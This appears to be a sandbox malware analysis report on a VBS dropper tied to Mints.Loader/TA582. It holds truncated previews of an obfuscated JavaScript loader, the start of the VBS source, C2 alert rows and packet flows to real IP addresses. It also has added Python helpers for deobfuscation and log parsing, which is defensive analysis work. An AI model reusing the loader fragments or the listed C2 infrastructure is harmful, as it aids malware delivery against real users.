Preview: var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1
Process: C:\Windows\System32\wscript.exe
File Type: ASCII text
Category: dropped
Size (bytes): 5511
Entropy (8bit): 4.266147627591556
Encrypted: false
SSDEEP: 96:7ysyAYXEdjm3uKRiTtfKbv3ZEptfBi3SwSGm+p9urbaF/Vxi71y0qPxfOUe7VP8A:7ysFYXE1m3KxfIxLV9uHaBVxeXifw98A
MD5: 0FD04EAFDBE2B9D4D0BA479ED8337804
SHA1: 8B8AF00F29C7AF0EC92F2843462873D1001F2FD2
SHA-256: 309200C4579E7D7945DB1AAA08C65C802A7DE84C0B43B8117DB75D4AAA622930
SHA-512: 2D54AB6FE2F71E03B360D2C0E5EF6269DA4EE8191445E9ACECEE4A1C935EAB8FDF1FC2C06A14B36DAA82E7BE0968F8EED1BF7FB30304BA8137C738F080E63691
Malicious: false
Preview: acosvb.txt.acvixr.txt.adimqh.txt.advkwe.txt.aehois.txt.agnprl.txt.ahtkco.txt.ajmdxh.txt.ajykuv.txt.alzcqd.txt.aolwzh.txt.aowqks.txt.apinhw.txt.apybvd.txt.aucjpi.txt.aviloh.txt.avjbmt.txt.awrgeb.txt.axgkvf.txt.axtfwk.txt.axyohf.txt.ayojtr.txt.bckimf.txt.bedskm.txt.bfmstk.txt.bgkluf.txt.bhrsok.txt.bjenhx.txt.bkuhcj.txt.bmkvfo.txt.bmntfc.txt.bnfpjq.txt.bnsqhl.txt.boctsi.txt.bqagtw.txt.brivej.txt.brmcuo.txt.brvcon.txt.bsuxni.txt.bsyhel.txt.buersl.txt.bvayux.txt.bvtnxg.txt.bwjsde.txt.bwqztc.txt.bynwiz.txt.cdfoxq.txt.cdsrne.txt.cenzsh.txt.cfvedw.txt.cgemlk.txt.chzwis.txt.cihlkf.txt.cjdams.txt.ckjhao.txt.cmhniy.txt.cmkovg.txt.cnowez.txt.codneq.txt.ctyhds.txt.cuzyrn.txt.cvbrkt.txt.cwalbf.txt.cwmist.txt.cwrqlj.txt.cwuspz.txt.cyuwxm.txt.czoahi.txt.dcswua.txt.dfzirc.txt.dimxvb.txt.djcuar.txt.djugez.txt.dkauol.txt.dlerac.txt.dnujfr.txt.dnyaje.txt.dpygbo.txt.dqetif.txt.drawbz.txt.dxvzfu.txt.dyvnzc.txt.dzlgtx.txt.eajylz.txt.eakigy.txt.eaojfc.txt.ebqkmv.txt.efznhl.txt.einfto.txt.ejorqk.txt.ejycbr.txt
Process: C:\Windows\System32\wscript.exe
File Type: Unicode text, UTF-8 text, with very long lines (1782)
Category: dropped
Size (bytes): 170414
Entropy (8bit): 4.833432010968271
Encrypted: false
SSDEEP: 1536:nwhPHH0Q7ISFxMA2klw3FyH0Q7ISFxLA2klw3F1A2klw3F7H0Q7ISFxhH0Q7ISFO:n6/NM4sQNL4sX4sRNlNk
MD5: 972C326427B4194C6D7A9654037440E0
SHA1: E757FD8E3330B5CB4D7F21F1E6228670175F4D9D
SHA-256: EB5BB439CF49B68E92CD06EAB1A126CC781D0B421F1995CE280E8A829F09199A
SHA-512: C97748CA961258214C7E27297890C1436DD761EACA9FF05A4C299F1202D14BA7E16B134AC8116AEC61B093C911A5429189BC21C3F37A18436B5DB06A88FD62E8
Malicious: false
Preview: var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllulbnolz:NllUc
MD5: F23953D4A58E404FCB67ADD0C45EB27A
SHA1: 2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256: 16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512: B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious: false
Preview: @...e................................................@..........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                              File Type:ISO-8859 text, with very long lines (1690)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):217286
                                                                                                                              Entropy (8bit):4.779915409780977
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:n5S7T815+tMK7T815AtMdtMW7T815m7T815N:W65rM65pMg65Q65N
                                                                                                                              MD5:32501F1A629003AAEA783C424BF58162
                                                                                                                              SHA1:37F4411551E69DECFE29F2AE03F7A20BACD561D4
                                                                                                                              SHA-256:59330861A9F72027763FDE810B9DCE92F600BDF51B5F62B7A67A016BA589C6E8
                                                                                                                              SHA-512:3A4698B0C36159203F67FBAA0383036674D6FBFB70C5863D86726B09E39DBAF0DF408EFC4C867185F072517C6B12B61DBC2BD5249925CE1C830A40BE2C789862
                                                                                                                              Malicious:true
                                                                                                                              Preview:var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1
                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                              File Type:ISO-8859 text, with very long lines (1782)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):170382
                                                                                                                              Entropy (8bit):4.831743980654334
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:nwhPeHJP7ITFxDA2klwyFoHJP7ITFx2A2klwyFIA2klwyFJHJP7ITFxpHJP7ITFz:n62QD4DiQ24Da4D7QdQJ
                                                                                                                              MD5:6C8668F63ABA9793A638CED8F3D097D8
                                                                                                                              SHA1:1BD2100FB3AA9550D4C8C445D028B2FE0BF4D920
                                                                                                                              SHA-256:6ADC893696B794C0312560092F0A07FEAB1D889567BC466F0744FF30BF1378E0
                                                                                                                              SHA-512:42D0A5321EA8CC516E3F6CCF8E1D1C60EDA2A5301D5829DB01282F329C72F00F8E57B789464D5930F11B4190CC723F0AB4E7EA21FC930F7817F35AEC7FAB01EF
                                                                                                                              Malicious:true
                                                                                                                              Preview:var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1
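Both wscript.exe drops above carry the same loader prologue, and the preview shows the javascript-obfuscator habit of hiding every number behind hex arithmetic: the string-array index offset in `andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1)`, and the `% 4` and `* 64` of an inlined base64 decoder further down. The Python below is an added helper written for this page, not part of the report or of the sample. It folds those expressions back to plain integers with a whitelist AST evaluator (no `eval`), folds bare chains only where the neighbouring token proves operator precedence cannot change the meaning, and reads the offset the rotated accessor subtracts. `SAMPLE` is copied from the report's file preview, which truncates the for-loop header; the cut is marked `...`.

```python
import ast
import operator
import re
from typing import Optional

# One integer literal as javascript-obfuscator emits it: hex, or decimal without
# a leading zero (Python's parser rejects "0123"; the obfuscator never emits it).
_LIT = r"-?(?:0x[0-9a-fA-F]+|0|[1-9][0-9]*)"
# Two or more literals joined by + - *, the only operators used to hide a number.
_CHAIN = rf"{_LIT}(?:\s*[*+-]\s*{_LIT})+"
# A parenthesised chain is always safe to fold: the parens bound its precedence.
_PAREN = re.compile(rf"\(\s*({_CHAIN})\s*\)")
# A bare chain is only safe when it is a whole operand: preceded by one of
# = , ( [ : ? and followed by one of , ; ) ] :  (otherwise "x - 0x5 - 0x3"
# would wrongly fold to "x - 2").
_BARE = re.compile(rf"([=,(\[:?]\s*)({_CHAIN})(?=\s*[,;)\]:])")
_BINOPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def _eval(node: ast.AST) -> int:
    """Evaluate an integer-only expression tree; names, calls and attributes are refused."""
    if isinstance(node, ast.Expression):
        return _eval(node.body)
    if isinstance(node, ast.Constant) and type(node.value) is int:
        return node.value
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
        return -_eval(node.operand)
    if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
        return _BINOPS[type(node.op)](_eval(node.left), _eval(node.right))
    raise ValueError(f"refusing to evaluate {type(node).__name__}")


def fold_expr(expr: str) -> int:
    """Value of one hex-arithmetic expression; JS and Python agree on + - * and unary minus."""
    return _eval(ast.parse(expr.strip(), mode="eval"))


def _render(value: int) -> str:
    # A negative result stays parenthesised so "x-(0x3-0x5)" becomes "x-(-2)", not "x--2".
    return str(value) if value >= 0 else f"({value})"


def fold_constants(js: str) -> str:
    """Rewrite every obfuscated integer expression in js to its plain value."""
    while True:  # nested parens such as ((0x5 + 0x3) * 0x2) need more than one pass
        folded = _PAREN.sub(lambda m: _render(fold_expr(m.group(1))), js)
        if folded == js:
            break
        js = folded
    return _BARE.sub(lambda m: m.group(1) + _render(fold_expr(m.group(2))), js)


_OFFSET = re.compile(r"(\w+)\s*=\s*\1\s*-\s*(\d+)\s*;")


def string_array_offset(js: str) -> Optional[int]:
    """Offset the accessor subtracts from each index before reading the string array."""
    m = _OFFSET.search(fold_constants(js))
    return int(m.group(2)) if m else None


# Fragment of the dropped loader exactly as the report previews it; the preview
# truncates the for-loop header, marked here with "...".
SAMPLE = (
    "andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);\n"
    "var ourtypos = wouldsovereignty[andrewforces];\n"
    "for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, "
    "wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; "
    "tHewith = Ourtypos['charAt'](wOuldsovereignty++); "
    "~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) "
    "? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, "
    "Courtvii++ % ...\n"
)

if __name__ == "__main__":
    print(fold_constants(SAMPLE))
    print("string array offset:", string_array_offset(SAMPLE))
```

On the previewed fragment the folder yields an offset of 331 and turns the loop body into `Courtvii % 4 ? sUchthe * 64 + tHewith : tHewith`, the familiar hand-rolled `atob`; the next step, pulling the string array out of the file and applying the offset to every accessor call, is not shown here.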
                                                                                                                              Process:C:\Windows\System32\curl.exe
                                                                                                                              File Type:ASCII text, with CR, LF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):557
                                                                                                                              Entropy (8bit):2.976369240847854
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgcdivIdaq+xIZ3:Vz6ykymUexb1U9cL9cddh+xG3
                                                                                                                              MD5:3AAE9DB95E9B0EE74F4D32680B777CDB
                                                                                                                              SHA1:590EBD81E873AF02B8F5EF00B16A3E55A7B61D39
                                                                                                                              SHA-256:E4AE696DCB8146B1CBE574D6BB7C38C69C885B7C4FEBD366791B8796718D0F76
                                                                                                                              SHA-512:B8E7D55C7436DD97B0ABFF4C995379EAFFD631354F41C0B806EDE1D3E290B1970428A30DDD99747AC8EB14CBE90A05C42C6CCF762A61887F05EC8EDA27C2B487
                                                                                                                              Malicious:false
                                                                                                                              Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0.100 1928 100 1928 0 0 801 0 0:00:02 0:00:02 --:--:-- 801.100 1928 100 1928 0 0 798 0 0:00:02 0:00:02 --:--:-- 799..
                                                                                                                              File type:ASCII text
                                                                                                                              Entropy (8bit):5.422741863094776
                                                                                                                              TrID:
                                                                                                                              • Visual Basic Script (13500/0) 100.00%
                                                                                                                              File name:67618a47ee8c5.vbs
                                                                                                                              File size:709 bytes
                                                                                                                              MD5:0518287873d4fb8925ae78fdcca2fcf4
                                                                                                                              SHA1:e9c1ef40ffb8b5cdbc2320ea1f8a5ea53fb5ebcc
                                                                                                                              SHA256:c7631ac3239d922066eb0d0a1da8f68c440c4af3d189558c890408a03f0e1a69
                                                                                                                              SHA512:7fed1dc12d32d9aea09bf6f643f6775fb5835805d53c91ffbf75da28c880834b615baefbf27317f9212374d1dace21d915cd5328939256bfedb0184e99d8d22a
                                                                                                                              SSDEEP:12:ab1ydJWCH4AddYN1dP17rZfHFXZ3ss7v8ZfzjqH6:ab1ydzH4witRrFH6FT
                                                                                                                              TLSH:E7017B52E6084B56D519528000255429E21DB9BA1CB5CA48E22FFD7F21684F52ED927F
                                                                                                                              File Content Preview:..function pVvId92(vHkR3pm51) . pVvId92 = Replace(vHkR3pm51,"|", "").end function..Dim shell, publicFolder.Set shell = CreateObject("WScript.Shell").publicFolder = shell.ExpandEnvironmentStrings("%PUBLIC%")...Dim vbsFilePath.vbsFilePath = publicFolder
                                                                                                                              Icon Hash:68d69b8f86ab9a86
Timestamp                        SID      Signature                                    Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-12-17T16:32:15.764124+0100  2057063  ET MALWARE Mints.Loader CnC Activity (GET)   1         192.168.2.6  49733        193.149.129.61  80         TCP
2024-12-17T16:32:15.764124+0100  2057743  ET MALWARE TA582 CnC Checkin                 1         192.168.2.6  49733        193.149.129.61  80         TCP
2024-12-17T16:32:15.873503+0100  2057063  ET MALWARE Mints.Loader CnC Activity (GET)   1         192.168.2.6  49732        193.149.129.61  80         TCP
2024-12-17T16:32:15.873503+0100  2057743  ET MALWARE TA582 CnC Checkin                 1         192.168.2.6  49732        193.149.129.61  80         TCP
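When this kind of report is flattened to text, the alert and packet tables lose their column separators, and a run such as `1192.168.2.649733193.149.129.6180TCP` can be cut more than one way (192.168.2.6:49733 to 193.149.129.61:80, to 193.149.129.6:180, or 192.168.2.64:9733 to either). The Python below is an added helper written for this page, not Joe Sandbox code: it enumerates every valid cut of a row, keeps only the cuts with exactly one local endpoint whose port lies in the Windows dynamic range, and lets the analyst pin whatever is left with the report's contacted-IP list. The sample rows are copied from the report as extracted; the local address 192.168.2.6 is read off them, and `remote_ips` is a hint the analyst supplies (here assumed to be 193.149.129.61, as the alert is an HTTP GET rule).

```python
import re
from typing import Iterator, List, NamedTuple, Optional, Set, Tuple

# Windows hands client sockets source ports from the dynamic range, so the analysis
# host's end of every flow must fall in it; that one rule settles most cuts.
EPHEMERAL = range(49152, 65536)


class Flow(NamedTuple):
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


_ALERT = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d+[+-]\d{4})(?P<sid>\d+)"
    r"(?P<sig>.*?)(?P<sev>\d)(?P<addr>[\d.]+)(?P<proto>TCP|UDP|ICMP)$"
)
_PACKET = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]+)(?P<addr>[\d.]+)$"
)


def _is_ip(s: str) -> bool:
    octets = s.split(".")
    return len(octets) == 4 and all(
        o.isdigit() and int(o) <= 255 and (o == "0" or o[0] != "0") for o in octets
    )


def _is_port(s: str) -> bool:
    return s.isdigit() and int(s) <= 65535 and (s == "0" or s[0] != "0")


def _splits(s: str, shape: Tuple[str, ...]) -> Iterator[Tuple[str, ...]]:
    """Every way to cut the digit-and-dot run s into the fields named by shape."""
    if not shape:
        if s == "":
            yield ()
        return
    kind = shape[0]
    lo, hi = (7, 15) if kind == "ip" else (1, 5)
    for n in range(lo, min(hi, len(s)) + 1):
        head = s[:n]
        ok = _is_ip(head) if kind == "ip" else _is_port(head)
        if ok:
            for rest in _splits(s[n:], shape[1:]):
                yield (head,) + rest


def _plausible(cands: List[Flow], local_ip: str, remote_ips: Optional[Set[str]]) -> List[Flow]:
    """Keep cuts with exactly one local endpoint on an ephemeral port and, when the
    analyst passes the report's contacted-IP list, a known remote endpoint."""
    keep = []
    for f in cands:
        if f.src_ip == local_ip and f.dst_ip != local_ip:
            local_port, remote = f.src_port, f.dst_ip
        elif f.dst_ip == local_ip and f.src_ip != local_ip:
            local_port, remote = f.dst_port, f.src_ip
        else:
            continue
        if local_port in EPHEMERAL and (remote_ips is None or remote in remote_ips):
            keep.append(f)
    return keep


def parse_packet(row: str, local_ip: str, remote_ips: Optional[Set[str]] = None) -> Tuple[str, List[Flow]]:
    """Packet row: timestamp, source port, dest port, source IP, dest IP."""
    m = _PACKET.match(row)
    if not m:
        raise ValueError(f"not a packet row: {row!r}")
    cands = [Flow(c[2], int(c[0]), c[3], int(c[1]))
             for c in _splits(m["addr"], ("port", "port", "ip", "ip"))]
    return m["ts"], _plausible(cands, local_ip, remote_ips)


def parse_alert(row: str, local_ip: str, remote_ips: Optional[Set[str]] = None) -> dict:
    """Suricata row: timestamp, SID, signature, severity, src IP, src port, dst IP, dst port, proto."""
    m = _ALERT.match(row)
    if not m:
        raise ValueError(f"not an alert row: {row!r}")
    cands = [Flow(c[0], int(c[1]), c[2], int(c[3]))
             for c in _splits(m["addr"], ("ip", "port", "ip", "port"))]
    return {"timestamp": m["ts"], "sid": int(m["sid"]), "signature": m["sig"],
            "severity": int(m["sev"]), "proto": m["proto"],
            "flows": _plausible(cands, local_ip, remote_ips)}


def remote_endpoints(rows: List[str], local_ip: str) -> Set[Tuple[str, int]]:
    """Distinct (remote IP, remote port) pairs from packet rows that resolve uniquely."""
    out = set()
    for row in rows:
        _, flows = parse_packet(row, local_ip)
        if len(flows) == 1:
            f = flows[0]
            out.add((f.dst_ip, f.dst_port) if f.src_ip == local_ip else (f.src_ip, f.src_port))
    return out


# Rows copied from this report as extracted.
ALERT_ROW = ("2024-12-17T16:32:15.764124+01002057063ET MALWARE Mints.Loader CnC Activity (GET)"
             "1192.168.2.649733193.149.129.6180TCP")
PACKET_ROWS = [
    "Dec 17, 2024 16:32:00.562515974 CET49709443192.168.2.645.11.180.77",
    "Dec 17, 2024 16:32:00.562566996 CET4434970945.11.180.77192.168.2.6",
    "Dec 17, 2024 16:32:05.043020964 CET49711443192.168.2.645.11.180.77",
]

if __name__ == "__main__":
    print(parse_alert(ALERT_ROW, "192.168.2.6")["flows"])
    print(parse_alert(ALERT_ROW, "192.168.2.6", remote_ips={"193.149.129.61"})["flows"])
    print(remote_endpoints(PACKET_ROWS, "192.168.2.6"))
```

The packet rows resolve on the ephemeral-port rule alone, because the competing cuts put the local end on 4970 or 4431. The alert row does not: both remaining cuts have the local end on 49733, and only the contacted-IP hint separates 193.149.129.61:80 from 193.149.129.6:180, so the helper returns both rather than guessing.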
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Dec 17, 2024 16:32:00.562515974 CET  49709        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:00.562566996 CET  443          49709      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:00.562628031 CET  49709        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:00.587830067 CET  49709        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:00.587863922 CET  443          49709      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:02.004332066 CET  443          49709      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:02.004409075 CET  49709        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:02.008205891 CET  49709        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:02.008222103 CET  443          49709      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:02.008552074 CET  443          49709      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:02.012118101 CET  49709        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:02.055325985 CET  443          49709      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:02.505084038 CET  443          49709      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:02.505116940 CET  443          49709      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:02.505161047 CET  49709        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:02.505176067 CET  443          49709      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:02.505192041 CET  443          49709      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:02.505225897 CET  49709        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:02.536662102 CET  49709        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:02.536675930 CET  443          49709      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:05.043020964 CET  49711        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:05.043098927 CET  443          49711      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:05.043369055 CET  49711        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:05.044728041 CET  49712        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:05.044826031 CET  443          49712      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:05.044903994 CET  49712        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:05.056171894 CET  49711        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:05.056214094 CET  443          49711      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:05.057209015 CET  49712        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:05.057250023 CET  443          49712      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:06.476413965 CET  443          49712      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:06.476526976 CET  49712        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:06.525676966 CET  49712        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:06.525732994 CET  443          49712      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:06.526668072 CET  443          49712      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:06.527928114 CET  49712        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:06.529457092 CET  49712        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:06.571368933 CET  443          49712      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:06.709386110 CET  443          49711      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:06.709492922 CET  49711        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:06.757762909 CET  49711        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:06.757802010 CET  443          49711      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:06.758776903 CET  443          49711      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:06.758841038 CET  49711        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:06.760824919 CET  49711        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:06.803328991 CET  443          49711      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:06.984641075 CET  443          49712      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:06.984715939 CET  443          49712      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:06.984743118 CET  49712        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:06.984813929 CET  443          49712      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:06.984849930 CET  49712        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:06.984873056 CET  49712        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:06.985332966 CET  443          49712      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:06.985385895 CET  49712        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:06.985452890 CET  443          49712      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:06.985503912 CET  49712        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:06.987163067 CET  49712        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:06.987195015 CET  443          49712      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:07.000488997 CET  49714        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:07.000565052 CET  443          49714      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:07.000654936 CET  49714        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:07.000897884 CET  49714        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:07.000933886 CET  443          49714      45.11.180.77  192.168.2.6
